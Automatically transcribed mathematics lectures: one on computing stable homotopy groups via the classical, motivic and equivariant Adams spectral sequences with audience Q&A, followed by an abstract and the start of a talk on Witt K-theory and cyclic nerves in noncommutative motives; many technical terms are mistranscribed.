that's a good kind of one, a good way of sort of motivating of wrapping your head around what the atom spectral sequence is really trying to do. Okay. So Ben, sorry to have interrupted you. There is a question on the chart. One more P on the E1 page. I don't see it right here. Here. Oh, yes, you're right. Okay. Thank you. That should be a P as well. Great. Okay. All right. So the upshot here is that the E2 page turns out to be is X over A, Fp, Fp. Okay. And then that's converging to the stable homotypic groups. Okay. That's the kind of like that. That's kind of like, you know, the consequence of having done all of this. Okay. And that's kind of like the key that that's somehow, some sense like that's the thing that you need to remember from all this. If like you didn't wrap your head fully around what all of this, if you didn't fully wrap your head around this whole construction of the atom spectral sequence and where it comes from and what it's motivated by, you don't necessarily to worry too much about that. What's important is that there is a spectral sequence. It starts from X groups and it converges to the stable homotypic groups. Okay. And we're not really going to dive into any of the details of the construction in the rest of these talks, but we are frequently going to be talking about X groups and how they're related to stable homotypic groups. Okay. So this one, this formula right here at the bottom is really kind of like the thing that we need to carry forward with us. Okay. So here is the program. The program is first compute those X groups. Okay. 
That's an algebraic exercise. We know A explicitly. We know Fp. We can do that X groups explicitly. That's algebraic. Then it's a spectral sequence and this spectral sequence can have differentials and it does have differentials. Okay. So you have to analyze the differentials in the atom spectral sequence. Okay. And then finally, you get this E infinity page, but then there's some interpretation of the final answer and that is involved the solving extension problems. Okay. So we're going to talk in great detail about each of these three parts of the program, but this is how it goes. There's always these three steps. You need the algebraic input. You need to analyze the differentials and then you need to interpret. You need to analyze the hidden extensions interpreting the final answer. Okay. So everything I've said over the last few minutes was entirely in the classical context. But these all work just fine. This is a pretty general setup here, right? And it works just fine, K-motivically or G-equivariantly. And the key point is you need to know about the cohomology of a point or the homology of a point, I guess, and you need to know the dual-steroid algebra explicitly. If you know the dual-steroid algebra explicitly and you know the homology of a point explicitly, then you're ready to go. You can start an atom spectral sequence project. Okay. And there are additional complications with convergence in this motivic or equivariant context, but these are manageable. It requires real work, but these things work out. And so various people who have worked on these constructions, these sort of foundational stuff for the motivic or equivariant atom spectral sequence include Morrell, Duggar, Elf, who increase, who increase, and Orm's B, maybe some others as well. Okay. Question. Is this X in modules or co-modules? Is there a difference? Okay. So what I, this is a good question, and this is an important point, and I always get sort of tripped up about this, and then there's Tor and Cotor also and all the duality. So what I'm thinking of here is X in modules. Notice when I wrote X sub A here. I didn't write A star. I wrote A. Okay. And so that's what I mean. I mean, A is a ring. Fp is a module over A, and I'm taking the derived functors of HOM in the category of A modules. Okay. That's what I'm referring to here. Okay. You know, when you take X, right, what you do is you take a resolution for F2, right, for Fp in the first variable, right? And then you hom it into Fp, right, and then you take homology. Okay. And the co-bar complex is what you get. The co-bar complex is the thing that when you take a free resolution of Fp, and then you hom it into Fp, what you get is the co-bar complex. Okay. And then the homology of the co-bar complex is X over A. Okay. So that sort of duality is kind of built in when I take the co-bar complex. That hom into Fp that's happening there. Okay. So that's the right way to think about this. You can set this all up in the category of co-modules. Okay. The category of co-modules is like dual is equivalent to the category of modules in some sense, and you can set it all up that way and change the names of things. But let me just leave it there. That's saying I mean X of A modules, X in A modules. Okay. All right. So what we need to learn about, right, is the co-homology of the classical steamer and algebra. In other words, that's the name that we give to X of A, F2, F2. So now I'm writing P equals 2 here because I want to talk in detail about how the computations play out. 
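Before turning to the charts, here is a compact summary of the construction just described, with everything implicitly p-completed; Ā denotes the augmentation ideal of the dual Steenrod algebra, as in the talk.
\[
\bar H\ \longrightarrow\ S^{0}\ \longrightarrow\ H,\qquad \pi_{*}(H\wedge H)=A_{*},\qquad \pi_{*}(H\wedge\bar H)=\bar A.
\]
The layers of the resulting tower are the spectra H ∧ H̄^{∧s}, whose homotopy groups assemble into the cobar complex
\[
\mathbb{F}_{p}\ \longrightarrow\ \bar A\ \longrightarrow\ \bar A\otimes\bar A\ \longrightarrow\ \bar A^{\otimes 3}\ \longrightarrow\ \cdots,
\]
and the spectral sequence of the tower is
\[
E_{2}=\operatorname{Ext}_{A}(\mathbb{F}_{p},\mathbb{F}_{p})\ \Longrightarrow\ \pi_{*}\bigl(S^{0}\bigr)^{\wedge}_{p}.
\]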
Okay. So that's the first thing we need to do. We need to dive in to this algebra and study this. Okay. So in the 21st century, the way that we study these X groups is by machine. Okay. Computers love to do linear algebra, and we can ask the computer to construct minimal free resolutions of F2 as long as it will hum along for a few months and produce all kinds of great data. Some people who are closely associated with this idea are Bruner, Nassau, and Guozhen Wong, who at various points have written and implemented effective software for doing this. Okay. These computations are effectively implemented in a very large range. Okay. Out to like, you know, say maybe 200 or more steps. Okay. Far beyond our ability to interpret it. Okay. And that will always be the case, right? So we should take the computer data essentially as given. Right? We have as much computer data as we want. Okay. So I am going to switch now. So let's take a look at what this ends up being. Okay. And we'll talk more about where this comes from in later points. But for now, I just want to dive in. I want to sort of look. Let's just look at some data. Okay. So what you're looking at here is a classical X chart. Okay. Or an add, or, you know, a classical Adams chart. Okay. So, you do see off to the right, you see some blue and red lines. Those are Adams differentials, which I don't want to talk about now. We'll come back later and we'll look at this chart again. It's just, this was the chart I had available. And so I just, I used it, right? But we want to kind of ignore those blue and red lines and just look at the black dots and lines. Okay. So this is what you get, right? There's this huge, big graded group. Okay. And it starts off looking in low dimensions. It starts off looking not too bad. Okay. It's, you know, it seems sort of manageable, right? And even in this range, right, there aren't too many dots. It sort of seems manageable, right? And as you go out further, things get more complicated, but still not too bad. It's getting me a little bit crazy around here. And then things get worse, you know, and sort of, you know, maybe more irregular. If I zoom out a little bit, I can show it. This chart goes out to 70. We have charts that go much further than that. But that obviously, but going out to 70 kind of like proves the point. When you get out into this range, things get, and again, we kind of want to ignore the colored lines, but even just look at the number of dots, like right here in this degree, there are three different dots, right? So things get a little bit complicated. Okay. You can see some regular patterns, right? Like if you look up along the top, you see this, a regular repeating pattern there. Okay. And you also kind of see some parallelograms that kind of regularly repeat along here. And there's some, there is some regularity at the top of the chart. And there's a lot of noise along, along the bottom. Okay. So this is what happens. You start with the steward an algebras, you start with F2, you compute X, and you get this thing, right? That has structure that has, you know, periodicity that has some regular structure, but also has a lot of irregular structure. Okay. And that's what you expect is you go into higher and higher stems, you expect to see more and more complications, more and more irregularities, and that's okay. Okay. All right. So this is what it's meant to be, so there's no detail here, right? Of course. 
And that's not the point, this is sort of more like a cultural kind of presentation rather than anything, you know, in, in, in specific, but to give a sense of what's going on. I should mention, well, while we're looking at this and the things we've talked about before, this guy here, H0, that's the, that guy detects the element 2. Okay. And that's 4 and that's 8 and so forth. H1 detects eta in pi 1. H2 detects nu in pi 3 and there's sigma in pi 7. Okay. We talked about eta nu and sigma, the motivic versions of them, but these are the classical versions, eta nu and sigma in pi, pi 1, pi 3, pi sigma, pi 7. Okay. And we also talked about this guy, this bracket in pi 8 5, right? We talked about this sort of like way you could construct another element in pi 8 5. And that's corresponding to this element right there called C0. Okay. And that's how I knew to write down that particular toto bracket because I knew that C0, that's the next thing that you might be interested in. Right? And so you could, so, and so I wrote down a bracket for that next thing and then pH1, you could try to write down a bracket for pH1 and pH2 and D0 and so forth, right? And these would be perfectly worthwhile things to have, have construction stuff. Okay. So you're already kind of picking up a lot of information just by looking at this chart kind of qualitatively without even worrying so much about where things exactly come from. Okay. So now the other thing I want to do, and again, this is, ah, okay, sorry, the question about the degrees here, right? So the vertical axis here is the atoms filtration. Okay. And the horizontal axis is the stem, the vertical axis is the atoms filtration and that's how all of my charts will be organized. Okay. So this is a classical chart, so there is no weight. Okay. It's just C0 in pi 8 here. Okay. So the way it comes out, its weight is 8.5. Okay. When I do show you motivic atoms charts later, they will not, the weight will be suppressed, right? The motivic atom spectral sequence is trigraded. There's the topological degree, there's the weight, and there's the atom filtration. Well, I can't plot it in three dimensions. I've tried and it doesn't work. So I have to suppress the weight. Okay. And so pi 8.5 will appear right here and you won't see the five. You'll have to go into the computations or look up the tables and see what the weights of these elements are. All the weights are known and they're in tables but they're not displayed on the charts. Okay. That's a great question about how the charts are laid out and where the weights are. Okay. So now what I want to do is I want to show you a different thing. I want to show you this. Okay. So I want this, maybe I'm just sort of showing off here by, okay, you guys should be able to see a window. Okay. So this is a Chrome browser and it is displaying an app that Hood Chatham wrote or is writing. So this thing is a, Hood is writing a spectral sequence sort of analysis tool. Okay. It doesn't do the hardcore computations. The hardcore computations are done elsewhere and then imported into this interactive tool. Okay. So I can scroll around on this thing, right, and I can click on a by degree, right, and then I click on that by degree and over here it lists on the right side. It shows me the name, gives me the names of the classes and it tells me something about the products. Okay. I can move, I can move elements around if I want to. 
For example, if I don't like the way these things are located, I can go in here and I can switch their locations, like I just did. Okay. And so forth. Okay. So this is still in a relatively primitive state. It's not ready for public release, but it is making progress, and I thought I would show it off and put in a plug for the great work that Hood is doing. This kind of a tool is a great way of keeping track of what's going on. When you get into higher stems, there end up being so many elements after a while that you really need a good way of keeping track of things, right, and all these different relations, and this is a nice interactive tool for really studying things. We intend eventually to allow inputting Adams differentials and so forth, and make it a really nice scratch pad for carrying out spectral sequence computations. So that's something that I'm hoping is coming in the next year or so, a product that I certainly want to use and that maybe other people who are carrying out these kinds of explicit computations would be interested in as well. Okay. So let me go back now to the presentation. Okay. And I want this one. Okay. So what I want to do next is talk about studying these Ext computations in more detail. What's really going on in these Ext computations? Okay, and the most naive way to tackle these Ext groups to begin with is to study the cobar complex. Okay. So I want to say a little bit about this; we're almost out of time for today, so I'll say a little bit now and then we'll pick this up again, I think on Thursday, in the next talk. But we'll start talking about it now. Okay. So first of all, I've been talking about the dual Steenrod algebra, but I haven't told you what it is explicitly. Okay. So what it is, is a polynomial algebra on generators zeta 1, zeta 2, zeta 3, and so forth. Okay. And this computation is due to Milnor. Okay. But this thing is a Hopf algebra, not just an algebra. Okay. It's got a product and a coproduct. Okay. And the coproduct, I've written down a formula for the coproduct over here on the right. Okay. So this is a complicated formula with a lot of moving parts and not so easy to understand, and I don't expect you to stare at this thing and memorize it and wrap your head around it fully. One thing to remember is that the coproduct in the dual corresponds to the product in the Steenrod algebra. So in the Steenrod algebra you have these Adem relations, right, that have to do with the product structure. The Adem relations are somehow encoded in this coproduct information here. Okay. The product, the nice polynomial product over here, corresponds to the coproduct in the Steenrod algebra. That's the Cartan formula. The Cartan formula is a nice regular thing in the Steenrod algebra, and that's corresponding to the nice regular polynomial structure here. Okay. One thing that I want to point out is: what are the primitive elements? The primitive elements are elements whose coproduct is just themselves tensor 1 plus 1 tensor themselves. Okay. And the elements that are primitive are precisely zeta 1 to the power 2 to the n. Okay. And that's it. Okay. If you take anything other than zeta 1 to a power of 2, then you're going to get something that's not primitive. Okay. So that's an important point that we'll see in a minute here. Okay. So the cobar complex: we've talked about this; it starts with F2, then A bar. Okay.
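Before continuing with the cobar terms, for reference: the formula being pointed to on the slide is Milnor's standard description of the dual Steenrod algebra at p = 2; the display below is the well-known formula, supplied here rather than transcribed from the board.
\[
A_{*}=\mathbb{F}_{2}[\zeta_{1},\zeta_{2},\zeta_{3},\dots],\qquad
\psi(\zeta_{n})=\sum_{i=0}^{n}\zeta_{n-i}^{\,2^{i}}\otimes\zeta_{i}\quad(\zeta_{0}=1),
\]
so that the primitive elements are exactly the powers ζ_1^{2^n}, as noted above.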
And then A bar, tensor A bar, and so on and so forth. Okay. So if you dive a little deeper into the cobar complex and you look at what these maps are, you discover that this first map is the coproduct. Okay. So if you want to actually compute the homology of the copar complex, which is exactly what we want, we want the homology, you need to understand this coproduct, which I've written down here. Okay. And we'll dive into this next time. Okay. So next time we'll go back a little bit. We'll set up the cobar complex again and we'll dive more into computing X groups and we'll carry out lots of explicit examples. Okay. I think that's a good place to stop for today. Okay. Many thanks indeed. And let's thank the speaker. And so are there any questions? Please raise your hand to the chart, please. There is a question. Yeah. Are there people working with Motivic? He wrote A-N-S-S, which is Adam's Novikov spectral sequence for other primes. And Adam's Novikov spectral sequence is something to work on. But what we've been talking about today is Adam's spectral sequence at other primes. So not so much. Okay. There are some philosophical reasons to anticipate that while the Motivic Adam's spectral sequence has been sort of really interesting at the prime two, that at odd primes somehow things are a little bit more kind of just like the classical story with some extra weights thrown in and a little bit of curiosity. Okay. There are some indications that that has been, or let me rephrase that. Let me say the conventional wisdom over the last 10 years has been that somehow the odd primary computations will be like classical with a little kind of like, you know, perturbation, a little, you know, a few little wrinkles. The P equals two computations are somehow much more fundamentally interesting. Over time, I'm becoming less and less convinced of that conventional wisdom. So I consider it sort of like this odd primary computations to be sort of a wide open subject. I think there's a lot of room for someone to dive in and really sort of tear these things apart and see what's going on and have a good and try to get a better understanding of what's happening there. So there is some work, you know, but there's really nothing like real well-developed. Okay. Other question. Any special homology theories such that sigma or nu is not zero? Okay. So I question, I think the idea here is that can you so the thing about, you know, the ordinary homology is that it detects one, right, and sort of nothing else, right? And and maybe and then something like K O complex, sorry, not complex real K theory, detects the element eta, right? And then the idea is that could you go further along those lines and find something further more complicated than K O that detects nu and detects sigma. Okay. So it depends on what you're looking for. But one thing that detects nu is is TMF. Okay. And that's sort of one big reason why TMF is so interesting is that it captures eta and nu and the various higher consequences of having eta and nu at hand. Okay. And yet it throws out all of the additional complications that occur with sigma and in higher places. Like so, for example, when we wrote down that form that total bracket for that guy in pi eight that what was it, eta comma one minus epsilon comma nu squared. Well that's a thing that's built out of eta and nu and two and things like that. And so that guy does is detected by TMF because it's associated to those eta and nu type family. Right. 
And so that's one answer is that that's kind of like from my perspective, that's why TMF is so interesting. Other people have other reasons for it. And that's and those are important reasons also similar work regarding the equivalent case. Yes, absolutely. We are in the midst of cranking through the atom spectral sequence at for the C2 equivalent atom spectral sequence anyway, and we are making progress. And I'm hoping by the end of the third talk to at least talk a little bit about that. That's time permitting. We may or may not get to that, but absolutely. One can one can see there's work there by Bert G. You and myself, Mike Hill, Doug Ravennail, Bert G. You and myself and Hanukong has also made some progress along those lines. Milnervitt K3 know about nu and sigma. New Milnervitt K3 does not know about nu and sigma. I wrote on that slide here, I can share that. Let me find that slide. I wrote on this slide. I'll see also Milnervitt K3. What I meant by that was that many of the formulas that I wrote down, many of the constructions and formulas that I wrote down in this section are related to Milnervitt K3. Not all of it, in particular the nu and the sigma are not in Milnervitt K3, but the eta, the rho, the 1 minus epsilon, the bracket u, that part of it is really sitting inside of Milnervitt K3. I'm sorry for that. That was my fault for writing a confusing slide. Equivariant dual-steam-run algebra for p and odd prime. Yes, lots is known about the equivariant steam-run algebra at even primes and at odd primes. The thing to remember is that you have to have a group as well. It depends on what group. If you're working with C2, then I think we know both the odd and the, you know, we know the two primary steam-run algebra. We also know the odd primary steam-run algebra. But the odd primary steam-run algebra is not very interesting. It's C2. C2 is a group of four or two. We expect the p equals two computations to be more interesting than the odd primary computations. For CP, for an odd prime p for CP, I think that this is now known. And maybe in slightly more generality. What I would look at is, I would go, I don't have to top of my head, I don't have the answer, but I would go search for things that Igor Krisch and various co-authors have written, have been writing recently, have been writing about this. And I forget exactly what, but there is sort of an ongoing program to expand these kind of steam-run algebra, co-molgeal point computations into larger and larger classes of groups. And unfortunately, things get kind of really complicated really quickly. And we're not ready yet to dive into atoms, computations with those types of things yet, because they're just, even C2 is really giving us a real challenge. And the bigger groups are just going to be a nightmare at this point, although eventually we'll get there, but that's off in the future. Atoms types, fixed sequence based on Chow-Witt co-molge. I have not thought about that. I'm not exactly sure what you mean by Chow-Witt co-molge. I think maybe you mean something like KQ or KQ with Aida inverted or something like that. So maybe you're kind of getting at some sort of version of this, so this BO resolutions. Yeah, so yeah, I think you mean KQ with Aida inverted, then maybe, maybe. I don't know what that reminds me. The question, Sean Tilson's question reminds me about Chow-Witt co-molge, reminds me of this, this story of BO resolutions. 
So Mahowald and co-authors attempted to mimic the atom spectral sequence, but instead of using homology, H, ordinary homology, they used something like KO, real K theory, and they tried to carry out an atom spectral sequence type analysis for KO. And they got a fair ways, right? And they saw some interesting structure that you couldn't see otherwise. So it was partly successful. But the computations also get very complicated. And so it was only partly successful. Some of that KO story is now being developed in the motivic context. So who is this? So Dominic Culver and JD Quigley and maybe some other people as well are working on that sort of thing. Okay, Mark Levine is saying that Chow-Witt is like a version of C2-Bredon homology. Yeah, then I'm not really sure how Chow-Witt fits into this. It's not something I've thought about. Okay, the homology of a point, how does one go around these computations? Okay, so, oh sorry, I'm jumping here. Wait, let me go in order. Can you explain what E1 and E2 definition are here? Is the spectral sequence defined in a different way to come on to theory? Okay, so I think the question here is with the atom spectral sequence, right? How is E1, how are E1 and E2 defined? So E1 is defined simply by taking the homotopy of the homotopy groups of these third terms, of these layers. Okay, that's all it is. It's just that. That's the definition of the E1 term. And it turns out that we know what the homotopy of these guys are. And this has, and it's expressible in terms of the co-bar complex. Okay, so there's two steps here. Formally E1 is this, and then computationally we know that this equals something in terms of a bar about the augmentation ideal of the dual-stereoalgebra. Okay? Then the E2 page is defined to be the homology of the E1 page. There is a differential on the E1 page that goes from one term to the next. So here's how it goes. If you start with something like this, right, you remember this is a co-fiber sequence. Okay? So there is a map, there's a shift map, right, a boundary map from this guy, it goes maps here, let me draw it in color. There is a shift map that goes back there, right? It goes to the suspension of that thing. Okay? And then, so you can apply that and then apply that map, and you get a map from here to here. And the same thing, from here you have applied the boundary map, and then down, and so on and so forth. And that map, that's the D1, okay? So when you take the homology of E1 with respect to that differential, you get the E2 group, the E2, and that turns out to be X. And again, that's a computation, right? So formally, it's given by this composition, but it's a computation that it works out to be X over A. Okay? And then about the motivical homology of a point, how does one go about those computations? Okay, so computing the motivical homology of a point is a very deep, very difficult problem, right? This is the blockado conjecture, right? So Vavadsky did these computations, okay? That is, I do not feel qualified to talk about the details of that sort of thing here, and so I'm not gonna say anything about it, and it's certainly not something we're gonna get into in any detail. However, let me foreshadow something that I'm gonna say more about tomorrow, that in certain cases now, we have a kind of a way of working around all of the deep, difficult mathematics that Vavadsky did to compute the motivics, the neuron algebra, and to compute the motivical homology of a point, okay? 
So in certain cases, in particular in C-motivic homotopy theory, for the kinds of things that I do, we don't really need Voevodsky's computations anymore. We have another way of accessing the same results, using deformations of homotopy theories, and I will say a little bit more about that in my second talk on Thursday. Okay, let's thank the speaker again, and so, well, the next talk is in 90 minutes, maybe less, by Teena Gerhardt at 6 o'clock Paris time. Okay, I'm seeing a comment. I'm in no hurry to leave, I'll stick around, and this channel stays open, right? Yes. Okay, I'm seeing a comment from Paul Arne that Sean means Milnor-Witt motivic cohomology. So right, that makes a lot more sense to me. I don't know. That's an intriguing idea. I mean, I know of this Milnor-Witt motivic cohomology, but I don't know much about it; Tom Bachmann, who was here, may or may not be here right now, he has been here at times this week, and probably can tell us a lot more about that. So that's an interesting question. My first question is: what about the co-operations? Do we know anything about the operations in Milnor-Witt motivic cohomology? That may or may not be the most important question for people who study Milnor-Witt motivic cohomology, but for the purposes of explicit computation, that would be kind of an important question, right? And I guess maybe the idea would be that the Adams spectral sequence in this context then completely captures Milnor K-theory, right? Something like that might be the way it works out. I don't know. Good question. Sounds like an interesting project, but I don't know enough to assess whether it's realistic or not. I'm not saying it isn't, I just don't know. Then another question from Andy Baker. Yeah, I see that. All right. I'm getting a question. Discussion time. Sorry? Discussion time now. Yeah, yeah. I mean, this is fine with you if I keep going, right? As long as there are questions. Yeah, in fact, I'm here during the day. Okay, great. So, I think that the difference between nu-bar and Toda's epsilon is eta sigma. Okay? And eta sigma is a multiple of eta, and so it's in the indeterminacy. So the actual answer, Andy, is that it detects both of those. And there's, yeah, well, I could go on; I'm going to restrain myself, because I could riff on this subject for a long time. But it's both, because of that. And you have to straighten that out. One of the tricky things you have to do in the eight and nine stems is to sort out the difference between them, and there's actually some hidden structure there; you need to be really careful about the difference between nu-bar and epsilon. And depending on how you look at it, you see it in different ways. Is there a way that we can see the question? Yes, Sean, I think if you go into the Q&A and you click on answered, there's a tab for open and a tab for answered, and the answered ones are there. Is there a way to detect the non-triviality of a given framed manifold? Right. So this question about framed manifolds goes back to the early, early history of stable homotopy groups. There's this close connection between framed cobordism, framed manifolds, and stable homotopy groups, and there was some work. I mean, I think maybe even like pi 3, right?
So Pi 3 maybe was even studied this way, right? Before it got to be sort of impractical. So I think that in that range, you can be, you know, up to like Pi 3, say, I think you can be explicit about how stable homotopy elements interact with framed manifolds. And my understanding is that once you get beyond that, that things really break down, you really can't, you know, people don't really know how to sort of write things down in those terms. In a motivic or equivariant context, I'm not even quite sure how that's going to play out. I mean, I guess there's a lot of recent work, right, about how framings relate to motivic stable homotopy, right? And that seems like kind of a promising direction. But you know, again, because my sort of specialty, my interest is in explicit computations, I don't know to what extent that's, I don't know to what extent that's kind of like you can do anything explicit. Although I don't know, maybe go back and look at the old, you know, work of, you know, Rocklin and I forget, there's another name associated with that that I'm drawing a blank on right now. But go back and look at that old work and see whether they're, whether you can kind of come up with the algebraic versions of the kind of like the manifold construction that those guys were, those guys were studying. Okay, good. All right, there's a reference for Milner-Vitt based atom-structural sequence. That's, yeah, that's promising. Equivariate Motivate Homotopy Theory. I mean, so, you know, inevitably, one is going to need to take Equivariate Motivate Homotopy Theory seriously. Right? There is some work I'm thinking of people like Ormsby, Heller, who increase, right? And maybe others who have been sort of laying out foundations and some, you know, preliminary steps in the direction of Equivariate Motivate Homotopy Theory. For sure, there are interesting things there. I'd probably be doing myself if I didn't have like a lifetime's worth of backlog of other problems that I want to solve first. I think that's, I think that's a great direction to go in. I think the key idea about Equivariate, the key idea is sort of like to choose the right kind of goal, right? What are you trying to do with Equivariate Motivate Homotopy Theory? And one of the things I would like to understand to know more about, I think that we should know more about is the quadratic construction in that context. But anyway, but this is a wide open question. So yeah, interesting stuff. The risk of asking a way to be. Okay, I'm going to talk through this again. I'm happy to explain this again. No problem. Okay. So these diagrams that you see on the left, they are not really kind of rigorous things. These are more like mnemonics, okay, tools to help us sort of like, you know, so we can communicate with the other and we know what we're talking about without being, you know, super explicit. Okay. So the idea here is that you might want to construct a complex, okay, find a spectrum, okay, and that spectrum should have S mod beta, the two cell complex as a sub complex. So maybe I can write a little bit here, right? So we're looking for some, some complex X. It should have S mod beta, it should receive a map from S mod beta. And the quotient, the cofiber should be some sphere. I'll just put an S star for a sphere. Okay. That's one way of expressing the idea that, that S mod beta, it can is the bottom two cells, right? And then there's a third cell S star. 
Okay, and also there should be a map from a sphere into X (this one corresponds to the bottom cell here) such that the quotient is the two-cell complex S mod alpha. You might ask for one X that has both of these properties. And it turns out that such an X exists if and only if alpha times beta equals zero. And then the same idea pertains here. I don't quite know what to call it; maybe we'll call it S mod gamma comma beta, that's my name for the three-cell complex. It should map into X and the quotient should be a sphere. And then a sphere maps into X and the quotient should be S mod beta comma alpha. So that's a little more detail about exactly what this is. Now what this means is somehow even more complicated, but you can break it down into what the parts mean, and those parts have to overlap consistently and so forth. Oh, right, and so I was going to finish this up here. I should say that one X exists if and only if alpha beta is zero, beta gamma is zero, and zero is in the bracket alpha comma beta comma gamma. And so the point here is that it's inevitable that you have to study Toda brackets. The Toda brackets simply are the answers to the questions that we care about, and so we need to study them.
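To spell the criterion out in symbols: this is the standard cell-complex formulation of what was just said, with suspensions, gradings and sign conventions suppressed, so read it as a sketch rather than as the precise statement on the slides.

\text{cofiber sequences}\quad S/\beta \longrightarrow X \longrightarrow S^{\ast} \quad\text{and}\quad S \longrightarrow X \longrightarrow S/\alpha \quad\text{coexist for one } X \iff \alpha\beta = 0,

\text{cofiber sequences}\quad S/(\gamma,\beta) \longrightarrow X \longrightarrow S^{\ast} \quad\text{and}\quad S \longrightarrow X \longrightarrow S/(\beta,\alpha) \quad\text{coexist for one } X \iff \alpha\beta = 0,\ \ \beta\gamma = 0,\ \ 0 \in \langle \alpha, \beta, \gamma \rangle.

Here S/\beta denotes the two-cell complex (the cofiber of \beta) and S/(\gamma,\beta) the three-cell complex named in the text.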
|
I will discuss a program for computing C2-equivariant, ℝ-motivic, ℂ-motivic, and classical stable homotopy groups, emphasizing the connections and relationships between the four homotopical contexts. The Adams spectral sequence and the effective spectral sequence are the key tools. The analysis of these spectral sequences breaks into three main steps: (1) algebraically compute the E2-page; (2) analyze differentials; (3) resolve hidden extensions. I will demonstrate a variety of techniques for each of these steps. I will make precise the idea that ℂ-motivic stable homotopy theory is a deformation of classical stable homotopy theory. I will discuss some future prospects for homotopical deformation theory in general. --- Here is a general reference for the topic of my presentations: - a question about tmf: Lurie used ideas from derived algebraic geometry to construct the classical spectrum tmf. Can this program be transported into motivic homotopy theory? Can we construct "motivic modular forms" spectra over some class of base schemes? For a construction of mmf over the complex numbers, see B. Gheorghe, D. C. Isaksen, A. Krause, and N. Ricka, C-motivic modular forms, J. Eur. Math. Soc., to appear.
|
10.5446/50939 (DOI)
|
So the title is Motives from a noncommutative point of view. As a reminder, the takeaway from the last two talks is this. For some fixed base commutative ring K, a K-algebra A and an A-bimodule M, I introduced an invariant which, for lack of a better word, I called the Witt K-theory of (A, M). Roughly speaking, I take the tensor algebra generated by M over A, I take its K-theory, I complete with respect to the natural filtration by degree, and I throw out the constant part. And this is a very nice invariant. First of all, it has the structure of a trace theory, which I discussed in my last talk, and which allows you to do lots of computations with it. In particular, the study of this for general A and M reduces to the situation where A is just K. And then, if specifically K is a perfect field of characteristic p, the answer is very surprisingly easy, namely that this Witt K-theory of K in degree i actually vanishes unless i is one. So it only exists in one degree, which allows you to construct all sorts of explicit models for it, and it becomes a generally very accessible invariant. So today I want to discuss cyclotomic structures on this thing. But before I do that, there is something else I want to explain. This is a very useful invariant, but it is kind of not the most fundamental one. There is another invariant which gives rise to this guy and some other invariants, which was kind of the original idea behind the whole business, and this invariant is based on the notion of a cyclic nerve. I had this already when I introduced the theory, but just for ordinary categories. So let me remind you of this category lambda. If we consider the fiber category over the object 1, so objects are objects equipped with a map to 1, then this is actually equivalent to Delta, the category of finite nonempty ordinals. And this is clear geometrically. Objects of lambda are, in the definition I gave you, quivers; I mean, there are different definitions, but the one I gave you works like this. So there are some quivers, and when you have a map to 1, this means that one edge of the quiver becomes distinguished. So there is one edge which is now distinguished, and you can just erase it. And if you erase it, you end up with basically a string: a quiver which is not a wheel but just a string. So the corresponding category is just a partially ordered set with some elements. So this gives you the equivalence. So now, if we have some small category I, and we have some functor F from I-opposite times I to sets, then we can define a simplicial set, which is known as the, no, I'm sorry. So, definition: cyclic nerve. I had this already last time, but without coefficients; now I need to use coefficients. The cyclic nerve of I with coefficients in F: it's a simplicial set, a functor from Delta-opposite to sets, and Delta I interpret as the fiber category from above. So let me describe what the values are. If I have some object here, which I think of as my wheel quiver, then for the usual cyclic nerve the values would be the set of configurations like this. I have an object at each vertex, i zero, i one, i two and so on, and then there are maps f zero, f one and so on; f l is actually a map from i l to i l plus one, for l from zero to n minus one. And then the last map. For the usual cyclic nerve it's again just a map in the category, but here it is modified: f n is actually an element of F applied to (i n, i zero).
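Spelled out, the set of n-simplices just described is the following (up to the variance conventions for F, which are not being fixed carefully here):

CN(I; F)_n \;=\; \coprod_{i_0, \dots, i_n \in I}\; I(i_0, i_1) \times I(i_1, i_2) \times \cdots \times I(i_{n-1}, i_n) \times F(i_n, i_0),

that is, a string of composable maps f_l : i_l \to i_{l+1} for 0 \le l \le n-1, closed up not by a map i_n \to i_0 as in the usual cyclic nerve, but by an element f_n \in F(i_n, i_0).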
All right. So this does not have a cyclic symmetry. I broken the cyclic symmetry by choosing one edge. But more than that, it's okay. So it gives me a simple set. So there's a question. How does a map from, to one gives a distinguished error? Okay. Or is this a map from one? No, it's a map from one would give me distinguished vertex. Just for this vertex. The point is that the category lambda is actually self-dual. Kind of the fanciest way to see it in terms of this functional description which I had, I mean, described maps as, as functions between some categories. Well, those functions have adjoints and you just take the adjoint. But also if you think geometrically, you think of realization of the quiver as some kind of, you know, solar decomposition of the circle. So there's a map from a circle to a circle. But then if you take an edge in the target and you take its preimage, then it lies inside a single edge upstairs. So there is some kind of sort of function which associates to my object. The set of edges of the decomposition is actually contravariant. And this gives me the distinguished edge. Perhaps I should draw a picture. It's not so easy to draw in this zoom thing, right? So the target is just one. Here I have some points. And then if you look at what the map actually does, you see that it has to contract all the edges except one to this point. So all this must be contracted and there is exactly a single edge which is not contracted. And that's the one that I chose. I hope that's clear. Yeah, okay, thanks. Right. So there is a cyclic nerve and then you can consider this geometric realization with some kind of topological space. Spaces. And now specifically for A, so you have P of A, which for me was the category of finely generated projective A models. And then the bi-module M defines a function P of M from P of A opposite. That's P of A to, well, to carry out the space, but at least for two sets, right? It's just a very naive one. So because P dash times P goes to home from P dash and then M times the A. So I can consider the cyclic nerve of this category P of A of the efficiency in this by function. And this can be called cyclic theory space. Perhaps I shouldn't, oh, it's a space, right? So dot would be the number of the groups. So this realization of the cyclic nerve P of A. And historically, this I think is what Dave writes to call. So this was considering this guy was suggested by Goodwill in a somewhat famous but unpublished letter. Well, 2000, Goodwill, well, well, 2000, from about 80. The point is, I mean, this, this is just a space, but it also has an interloop space structure if you just take direct sum of everything. So it's actually a spectrum and it's somehow better than say with K theory, which I considered because it's reasonably small. So for example, if K is a finite field, then this is just countable, right? So it should be something which is a computer, but in fact, it's not. So problem. That is very hard to compute. There is not enough structure. For example, we don't know as far as I understand, even now we don't know what it gives for just, you know, the point. Even the case of finite field, even the physical field. So in order to get some handle on this, we need to do something to use it to construct some more invalents, which are more amenable to computation. And in practice, what you do, you need some kind of completion. And this can be done in different ways. So for example, there is a theorem, which I believe is due to Lyndon Stowes. 
